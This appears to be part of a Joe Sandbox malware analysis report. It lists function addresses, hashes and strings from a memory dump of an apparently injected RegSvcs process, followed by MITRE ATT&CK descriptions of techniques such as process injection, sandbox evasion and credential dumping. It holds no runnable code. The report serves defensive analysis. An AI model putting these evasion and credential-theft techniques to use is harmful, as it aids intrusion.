Instruction Fuzzy Hash: 27412974605691CBD7158F3AD490772BBA2AF9B304F5C85ADC4C78B396C6389846CB18

Function 00413E50 Relevance: 3.4, Strings: 2, Instructions: 884COMMON

Download Yara Rule

Strings

EA, xrefs: 004145D2
NP,?, xrefs: 00414270

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: NP,?$EA
API String ID: 0-3550630486
Opcode ID: c8b8e796abceac3594a91b638e490a64fbfa8cc7ef476cca3c0e389b64e5e7b0
Instruction ID: 2e7f34938e04f27cbf53eb242d69fe801042e8981dab05c8edde02431b6dd9ba
Opcode Fuzzy Hash: c8b8e796abceac3594a91b638e490a64fbfa8cc7ef476cca3c0e389b64e5e7b0
Instruction Fuzzy Hash: 5E4222B4608201DBD7148F28E841BBB73A1FF86328F154A2DF591572E1E778EC55C78A

Function 0041F710 Relevance: 3.0, Strings: 2, Instructions: 527COMMON

Download Yara Rule

Strings

LMB, xrefs: 0041F7EF
pv, xrefs: 0041F797

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: LMB$pv
API String ID: 0-122907696
Opcode ID: 600361d03a19618f7b8b94130096601f70c9cb3cba6cb4618556b265baeca412
Instruction ID: 3eeefadaa77a5fd53610c3ddf5e6e08206d1469657b97126345bc7f1514b4473
Opcode Fuzzy Hash: 600361d03a19618f7b8b94130096601f70c9cb3cba6cb4618556b265baeca412
Instruction Fuzzy Hash: 17E134B15183008BD3249F29C8623ABB7F1EFD2314F19892DD5C68B3A5E7799846C786

Function 0043C410 Relevance: 2.8, Strings: 2, Instructions: 349COMMON

Download Yara Rule

Strings

mij, xrefs: 0043C6A1
NP,?, xrefs: 0043C620

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: NP,?$mij
API String ID: 0-1436015776
Opcode ID: b0905b15df5a93d70dff43b587df237d303d7f495d29f252faf92cbeebdeaadb
Instruction ID: d401854fd2cc12c548c1ecfb90c4d04a7bab5840ee8d20629697b9478a788be7
Opcode Fuzzy Hash: b0905b15df5a93d70dff43b587df237d303d7f495d29f252faf92cbeebdeaadb
Instruction Fuzzy Hash: BAA159756043109BD314DF25C8C162BB7A1EBC9728F24662EE9A5373D1D338EC018BDA

Function 0042DFAF Relevance: 2.6, Strings: 2, Instructions: 124COMMON

Download Yara Rule

Strings

fI.K, xrefs: 0042E873
M"O, xrefs: 0042E87A

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: M"O$fI.K
API String ID: 0-3473069917
Opcode ID: 80b5e25900e62fa5b7f868b9038989c12ce663ab15b6782b2becc0f24b60a991
Instruction ID: 329e37de618e8a484b718af78b4319e64e69ed5ee2b204ae71a9d2e2a7026588
Opcode Fuzzy Hash: 80b5e25900e62fa5b7f868b9038989c12ce663ab15b6782b2becc0f24b60a991
Instruction Fuzzy Hash: 6431F275204691CBE7058F2AD450332FBE2EFA2310F69959DC0C69B392C679A8038B98

Function 0042E7EB Relevance: 2.6, Strings: 2, Instructions: 108COMMON

Download Yara Rule

Strings

fI.K, xrefs: 0042E873
M"O, xrefs: 0042E87A

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: M"O$fI.K
API String ID: 0-3473069917
Opcode ID: a50f177498f9f56b16f7faf9ec1f3eef4274cbe2d8e1a906e5367dc70dca7c59
Instruction ID: f6fd3104235a574d950e3c7a6e1b37e2e28bb9fd8ddddb0b7385076b5cae7f54
Opcode Fuzzy Hash: a50f177498f9f56b16f7faf9ec1f3eef4274cbe2d8e1a906e5367dc70dca7c59
Instruction Fuzzy Hash: 9531E4752047418BE705CF2AD850723FBE2EFA6310F69959DC0C59F392CA79A843CB88

Function 004273A0 Relevance: 1.6, Strings: 1, Instructions: 311COMMON

Download Yara Rule

Strings

@uB, xrefs: 004275E0

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: @uB
API String ID: 0-1161951709
Opcode ID: f8a3ba9d7d15869a0590316285b3361bbc22125b0af2a42800cc0a1cbe75883f
Instruction ID: 3f551a4cb18cdb69ea81a70624d177d743b65059aaf82db93a0913f8d0b3051b
Opcode Fuzzy Hash: f8a3ba9d7d15869a0590316285b3361bbc22125b0af2a42800cc0a1cbe75883f
Instruction Fuzzy Hash: BBA10FB560C300CFD714DF29E84162BB7E5FB86314F98482EF585A3251EB78E902CB5A

Function 004082A0 Relevance: 1.5, Strings: 1, Instructions: 288COMMON

Download Yara Rule

Strings

%=>?, xrefs: 004083E0

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: %=>?
API String ID: 0-1840824467
Opcode ID: e07febe003d47278271e69a6a0aefd5b767d6bdb8c9269540a4227fbb6a47e9b
Instruction ID: 2abc8e8e60c77c2f0b16dca8ff0b337e7e89a8bc06769c8938415a8ee5640db8
Opcode Fuzzy Hash: e07febe003d47278271e69a6a0aefd5b767d6bdb8c9269540a4227fbb6a47e9b
Instruction Fuzzy Hash: 3291F832F046664BC7108E2DCA8025BB7E1ABC5754F698A3EE8D4E73D5EA3CCC454789

Function 0042E002 Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

79.', xrefs: 0042E015

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: 79.'
API String ID: 0-3373235548
Opcode ID: 3052bdd5b9f525bfd9188c849dd4df91fdd9a95299ae7d6644acfbbe7ea22ffb
Instruction ID: 405c93bd9d9a1b956de89b764b78e8638e9be0a0d1f875f63fdafa76fe9ef724
Opcode Fuzzy Hash: 3052bdd5b9f525bfd9188c849dd4df91fdd9a95299ae7d6644acfbbe7ea22ffb
Instruction Fuzzy Hash: 4841E7745043A08BE7274B2A98A0733BFE1BF13305F68598DD0D21B792C26AA407CB55

Function 00426A00 Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

"jB, xrefs: 00426A1C

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID: "jB
API String ID: 0-3276335117
Opcode ID: 1f66a87aa27601af76395a073f8366dbe3f1549dff5cf4ca866cc54e43ced975
Instruction ID: 5e1d8c0b1515ecfa31faa1c568337e693052fbc6b42adfdfb911d364570a270e
Opcode Fuzzy Hash: 1f66a87aa27601af76395a073f8366dbe3f1549dff5cf4ca866cc54e43ced975
Instruction Fuzzy Hash: D3C08CB6C080028FC5002F00AC0201AB9316B0320CF082039E40931133FA32F625950F

Function 00407400 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c7625dc8a02050d2483af0f75c91bb5bc7877375563f0b19dd77e196208affe
Instruction ID: 4df813ee5f95e841ab821c98b8b5526f3f5ae33236fdb9f70e9fd3558806e740
Opcode Fuzzy Hash: 0c7625dc8a02050d2483af0f75c91bb5bc7877375563f0b19dd77e196208affe
Instruction Fuzzy Hash: FA22A371A087119BC725DE18D9806ABB3E1BFC4319F19893ED9C6A7385D738B811CB87

Function 004288BA Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 597fc938b3c7907baa933e39222336cfaebac5f4fa080b08cb07518a9a992129
Instruction ID: 4fc516d3c2b442602e552858b68be7734632adc4e96252525e150f64ed3c5c82
Opcode Fuzzy Hash: 597fc938b3c7907baa933e39222336cfaebac5f4fa080b08cb07518a9a992129
Instruction Fuzzy Hash: A3C12DB6E016258FCB18CF68D89166EB7F1FF89310F59456DD816AB391DB34AC01CB90

Function 00415590 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43780e1e2e3a758066292245f2d39f1e33420cfffaa8785e26d50e06e5c09363
Instruction ID: ecd98b3e30f16e247b6e37ac7b6d2412abfb1e49c209f28e4dabdc3486cf8122
Opcode Fuzzy Hash: 43780e1e2e3a758066292245f2d39f1e33420cfffaa8785e26d50e06e5c09363
Instruction Fuzzy Hash: BCA11934204A01CFD7158F29D850AF6B7A2FF87310F5945AAD1968B3E2D738A852CB99

Function 00426D70 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 562f13b772a4c344ec1b8f71eb9ccd99c74adc9a64e63efcfea3790b2c30ed1d
Instruction ID: 9e2cb37ed21e11fbad960dddf737aaa980f21f536591a4909efc8a2909d6cdd4
Opcode Fuzzy Hash: 562f13b772a4c344ec1b8f71eb9ccd99c74adc9a64e63efcfea3790b2c30ed1d
Instruction Fuzzy Hash: 8B816BB2A093208BC718DF24D85026BBBF2EFD1314F59CA2DE4C59B394E7789905C786

Function 004427E0 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153fd498e0abb89b475a44109399731ffe09bfd7c5c5609ef9d685e9fddd8eb3
Instruction ID: 16ab1bb8e5813cbead69206b7097d26a452845dfa9c2a9323bffdb95a06fe9c3
Opcode Fuzzy Hash: 153fd498e0abb89b475a44109399731ffe09bfd7c5c5609ef9d685e9fddd8eb3
Instruction Fuzzy Hash: 3B81C0342042028BE724DF19C980A2BB3F1FF99314F55866DF9949B3A1EB75DC52CB4A

Function 0041DC40 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 846d745e799860ef9ea4e03aa7af84ae1be1fd3816dfe5359127a6eef7797514
Instruction ID: 50f91a7135ac995fafd84abb40a2ff73bb47e1f903fd8f1524f89d133c35058d
Opcode Fuzzy Hash: 846d745e799860ef9ea4e03aa7af84ae1be1fd3816dfe5359127a6eef7797514
Instruction Fuzzy Hash: B461B974A083918FC7258F38C88096F7BE1AF96310F0882BEE8D44B392D679DC45C796

Function 00402940 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94ca20dc4f76e8c3e8d02b75f9c402b180f2256a0ed4e9f610f16215ed658aa6
Instruction ID: 54b1615ece0800edf578a66f6fa2aba7240dcbf02494f9453b14f9bc813aead1
Opcode Fuzzy Hash: 94ca20dc4f76e8c3e8d02b75f9c402b180f2256a0ed4e9f610f16215ed658aa6
Instruction Fuzzy Hash: 39411732B0C2654BC7149E2D8D5427ABBD29FC5218F0DC57EA8C9DB7C7E57898009785

Function 00429871 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00e3dc9464124a9ac3936808daaa6cb7d54e00a4530c727067c019b61550166a
Instruction ID: 3e828dc637c6aee99513c29835b99d357d4520004c741a88f318c34ece8bb8a3
Opcode Fuzzy Hash: 00e3dc9464124a9ac3936808daaa6cb7d54e00a4530c727067c019b61550166a
Instruction Fuzzy Hash: E941E071E043258BDB10DF49D8922ABB372FF66314F19411ADC84AB354E739AD01CBA9

Function 00408CD0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f822273db6c68e011de364cdba3ced214ba853329870a82143a1b3826a5d9c10
Instruction ID: f2730a4bd8400e6ccca1806e7c2ae68197e714b3aafd468424d48539a12bf7a5
Opcode Fuzzy Hash: f822273db6c68e011de364cdba3ced214ba853329870a82143a1b3826a5d9c10
Instruction Fuzzy Hash: 963179221487538BDB148928C9911B7FB51EFB2360F18473FC492177C1EB38A929D3E9

Function 0040DFEA Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d451ddeb5618286ed8eacd871469a17d4232f0dfe3db3b93bda8811cc9b43ae3
Instruction ID: f14b1e3348f7832c914038d0d787e57ee05bed21178a428e04cc6a3a25562b9c
Opcode Fuzzy Hash: d451ddeb5618286ed8eacd871469a17d4232f0dfe3db3b93bda8811cc9b43ae3
Instruction Fuzzy Hash: 5A311474610601CFD719CF2AC990A3377A2FB8A310B248E69D5566BBE5D774EC21CB88

Function 0040DE72 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b56e36517da7a27e33ef45fdc150f204755ea86d778f10d59046157777f86f8c
Instruction ID: 57171615dec06f4b3ea34e7e1adccaef3f23bda716e905d6b8a786efa676c01b
Opcode Fuzzy Hash: b56e36517da7a27e33ef45fdc150f204755ea86d778f10d59046157777f86f8c
Instruction Fuzzy Hash: 8E318478B00502DFD318CF69DC40A327367FB86315B65863AE512A73E4DB74EC268A9D

Function 0043EB00 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7799af4de0b1a804fd633f699550772e22bf464a91c8aab1c1220e8e50eaa2f3
Instruction ID: f4efb102148d56746155fcf0a69e0a073b2616fb0f7bc1048f615d5ae5911f58
Opcode Fuzzy Hash: 7799af4de0b1a804fd633f699550772e22bf464a91c8aab1c1220e8e50eaa2f3
Instruction Fuzzy Hash: 7C2148719092108BE318CF1AC85576BFBA1EBC9328F19A52EE895573C0D37DDC418795

Function 00415C25 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 664478ecc493b7daad9ed5f4edac06f81c9f2eac4be26fbb9471f6581503d05a
Instruction ID: 3802dad517a1dce3a34934a6d2a34ff46c5f85f7b1ffb06216fa93cce7cae3e8
Opcode Fuzzy Hash: 664478ecc493b7daad9ed5f4edac06f81c9f2eac4be26fbb9471f6581503d05a
Instruction Fuzzy Hash: 53210774610B01CFD325CF29C84096677B2FF82314B19856DD0961BB76E734EC52CB88

Function 00438AF0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 64260c404912ea7eadd8c0e068931427c058d1959da23024316477ca1ba720c8
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 83112933A052D10EC3128D3C8410565FFA30EA7234F29939EF4B49B2D2DA269D8B8359

Function 0042B430 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f053cbb5fb3d7dc403b9872d41e17036f9bd54e3a02cbcbb3c617f8fe574da9e
Instruction ID: 9ac58ec8d4b3439cda35f7244ec872c65e6fe70fd35cd3954e032617cd07918a
Opcode Fuzzy Hash: f053cbb5fb3d7dc403b9872d41e17036f9bd54e3a02cbcbb3c617f8fe574da9e
Instruction Fuzzy Hash: CD015EF1B017124BD620AE55E4C1727A3A8AB9070CF58453EE9049B343EB79FC1586DA

Function 0043EE10 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1731410d0e3cc220da59a8d1e9685258228a98747c5e126bdcfafed42aad0d04
Instruction ID: 8b14ff6e9f909d0a458ac4e63c91713bd7563fb29c01f731cd10e6b3bc0629ea
Opcode Fuzzy Hash: 1731410d0e3cc220da59a8d1e9685258228a98747c5e126bdcfafed42aad0d04
Instruction Fuzzy Hash: EDF0F935500208BBD2204B079C41D37736EFB9E768F101329F525232E1E362ED2187E9

Function 0041DEB0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: 678eaee0e22883ac7a801a5a92a95a4c58884562fe07dcc7c3908c64aa7d63e3
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: 5AD0A7B1948BB10E57588D3804E04B7FBE8EA47613B18159FE4D2E7205D224DC41469C

Function 00440310 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b7598ff860c6c584cc28cc9e2ee4f827b81178b3db001d57e5e8ec4a7167bec
Instruction ID: 776a1f7dd0c074e79f55533e911544892ec85f46c384d1e8a4e462c15b4e92e9
Opcode Fuzzy Hash: 9b7598ff860c6c584cc28cc9e2ee4f827b81178b3db001d57e5e8ec4a7167bec
Instruction Fuzzy Hash: 97D022B86481003B0248CB09CC4AE33B77CC387200F002034BE05C3350C610EC2182EE

Function 0042912D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 89COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,FF5DFD53,0000001E,00000000,00000000,0=), ref: 004291F6

Strings

ER, xrefs: 00429152
0=, xrefs: 00429160
P&, xrefs: 0042914B
0=, xrefs: 004291EA

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 0=$0=$ER$P&
API String ID: 237503144-76498936
Opcode ID: d0c15af12cbfad86f6864dd0905774a4f0b166c0b463e71c1bc931c37c03ad9b
Instruction ID: a2bc4232f0b587c6731111968c4b9dfd6b547f1d994af41bba96082cdda02b35
Opcode Fuzzy Hash: d0c15af12cbfad86f6864dd0905774a4f0b166c0b463e71c1bc931c37c03ad9b
Instruction Fuzzy Hash: 5E31A074A08B518FD7718F28D84036BBBF2FB85710F149E2DC4A69BB91D775A8428F84

Function 0040B5D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(004089EB), ref: 0040B5D6
FreeLibrary.KERNEL32 ref: 0040B5F7

Strings

#v, xrefs: 0040B5D6, 0040B5F7

Memory Dump Source

Source File: 00000003.00000002.2407012606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd

Similarity

API ID: FreeLibrary
String ID: #v
API String ID: 3664257935-554117064
Opcode ID: 62f50812e52bb63f360f50f5696872349249e40dfa0370fcd185f2f673d9e761
Instruction ID: 2b90beec229bcabb032f80ab3f8ed21d398b4004671114d789e0d62637093dd3
Opcode Fuzzy Hash: 62f50812e52bb63f360f50f5696872349249e40dfa0370fcd185f2f673d9e761
Instruction Fuzzy Hash: F8C002394401819FDF027B64FD4D8183E79FB92746310803AE40251535DB228920AFE9

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
